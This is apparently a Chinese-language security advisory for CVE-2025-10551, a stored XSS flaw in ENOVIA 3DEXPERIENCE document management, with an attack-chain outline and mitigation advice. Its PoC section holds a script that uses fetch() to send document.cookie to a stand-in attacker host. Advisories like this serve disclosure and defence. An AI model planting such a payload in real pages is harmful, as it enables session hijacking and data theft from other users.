CVE-2025-10551 CVSS 8.7 高危

CVE-2025-10551 ENOVIA存储型XSS漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-10551

漏洞类型

存储型跨站脚本攻击 (Stored XSS)

CVSS评分

8.7 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

ENOVIA Collaborative Industry Innovator

漏洞概述

该漏洞存在于ENOVIA协同行业创新器的文档管理功能中，影响3DEXPERIENCE R2023x至R2025x版本。由于系统未能对用户输入进行充分过滤，攻击者可植入恶意脚本。一旦受害者查看被篡改的文档，脚本将自动执行，进而窃取敏感数据、劫持用户会话或执行未授权操作。

技术细节

该漏洞属于典型的存储型跨站脚本攻击（Stored XSS）。在受影响版本的ENOVIA文档管理模块中，应用程序未能对用户提交的特定字段（如文档名称、描述或元数据）进行有效的输入验证和上下文感知的输出编码。攻击者经过身份验证后，可构造包含恶意JavaScript代码的载荷并上传至服务器。此载荷会被持久化存储在数据库中。当其他用户访问包含该恶意内容的页面时，服务器会直接返回未经过滤的数据，导致受害者的浏览器解析并执行恶意脚本。由于CVSS向量显示S:C（范围改变），攻击者不仅能影响当前用户，还可能利用受害者的权限横向移动，窃取Cookie或执行进一步攻击，造成高机密性和完整性损害。

攻击链分析

STEP 1

Reconnaissance

攻击者发现目标系统运行受影响版本的ENOVIA软件。

STEP 2

Payload Injection

攻击者使用低权限账户登录，并在文档管理的上传或编辑界面，在文档标题或描述字段中注入恶意JavaScript代码。

STEP 3

Storage

应用程序将包含恶意代码的文档数据保存到服务器数据库中，且未进行净化处理。

STEP 4

Trigger

诱导或等待管理员或其他用户浏览包含该恶意文档的列表页面。

STEP 5

Execution

受害者的浏览器解析页面时执行恶意脚本，攻击者以此获取敏感信息或执行进一步操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC for Stored XSS in Document Management -->
<!-- Attacker injects script into document title/description field -->
<script>
  // Example: Steal session cookie
  fetch('https://attacker-controlled-site.com/log?c=' + document.cookie);
  alert('XSS Triggered');
</script>
<!-- End PoC -->

影响范围

3DEXPERIENCE R2023x

3DEXPERIENCE R2024x

3DEXPERIENCE R2025x

防御指南

临时缓解措施

在未安装补丁前，建议限制对文档管理功能的访问权限，并对用户上传的文档元数据进行严格的人工或自动化审核，防止恶意脚本注入。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表